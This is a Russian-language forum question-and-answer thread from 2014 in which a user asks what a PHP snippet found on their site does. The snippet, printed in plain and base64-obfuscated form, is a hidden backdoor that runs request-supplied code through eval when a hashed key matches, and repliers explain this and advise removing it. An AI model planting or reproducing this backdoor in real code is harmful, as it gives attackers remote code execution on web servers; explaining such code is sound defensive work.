Пользователей всего:
5 1 2 8 9 8
Выплачено ($):
7`605`943,46
Выплат:
8`115`115
Писем прочитано:
1`024`954`354
Вопрос #64566
Внимание! В разделе вопрос-ответ запрещается:
Мат, оскорбления, флуд, реклама
Сообщения, не являющиеся вопросами/ответами
Нарушение законодательства РФ
Попрошайничество в любой форме
+1 [20.12.2014 20:18] #705395 Что делает этот php код
Есть вот такой кусок кода, какая логика его работы? что делает, что вызывает...
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'd01f6218646cc9dde3794e22d3d1985e') && isset($_REQUEST['php_code'])) { evаl($_REQUEST['php_code']); exit(); }
Раздел: Программирование , последний комментарий: 20.12.2014 20:47 Вопрос закрыт пользователем MiSsiS_IA
Проголосовали: SHAMAN_UA
Ответы
Ответов всего: 3
вопрос закрыт
+1 [20.12.2014 20:34] #1376936
позволяет злоумышленнику выполнить сторонний php код
удаляй
Проголосовали: SHAMAN_UA
+1 [20.12.2014 20:38] #705395
ну это понятно, оригинальный код выглядит так
evаl(base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUWydjaCddKSAmJiAobWQ1KCRfUkVRVUVTVFsnY2gnXSkg
PT0gJ2QwMWY2MjE4NjQ2Y2M5ZGRlMzc5NGUyMmQzZDE5ODVlJykgJiYgaXNzZXQoJF9SRVFVRVNUWydwaHBfY29kZS
ddKSkgeyBldmFsKCRfUkVRVUVTVFsncGhwX2NvZGUnXSk7IGV4aXQoKTsgfQ=='));
а это я уже раскодированый вариант кинул, просто хотелось знать, что конкретно он делал
Проголосовали: SHAMAN_UA
+8 [20.12.2014 20:47] #2126824
Если(if) определена или существует(isset) переменная ch массива $_REQUEST ($_REQUEST['ch']) и (&&) md5-хэш этой
переменной равен определенному хэшу(md5($_REQUEST['ch']) == 'd01f6218646cc9dde3794e22d3d1985e') ,
а также определена (isset) переменная php_code масива $_REQUEST ($_REQUEST['php_code']),
то выполняется код, который содержится в переменной php_code
и выполняется выход из скрипта(exit();)(то бишь скрипт не выводится в браузер)
Проголосовали: goningtbp , #2172053 , SHAMAN_UA , #1376936 , #1982336 , Janco , #874636 , TinyMouse
Реклама